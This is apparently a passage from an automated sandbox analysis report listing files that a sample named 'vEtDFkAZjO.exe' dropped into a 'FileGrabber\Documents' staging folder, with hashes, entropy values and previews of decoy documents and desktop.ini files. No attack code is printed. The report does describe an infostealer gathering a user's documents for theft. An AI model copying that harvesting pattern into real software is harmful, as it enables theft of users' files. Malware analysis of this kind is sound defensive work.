SPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\KATAXZVCPS\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\KATAXZVCPS\JSDNGYCOWY.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\KATAXZVCPS\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\KATAXZVCPS\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\KATAXZVCPS\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\LTKMYBSEYZ.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\My Music\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\My Videos\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
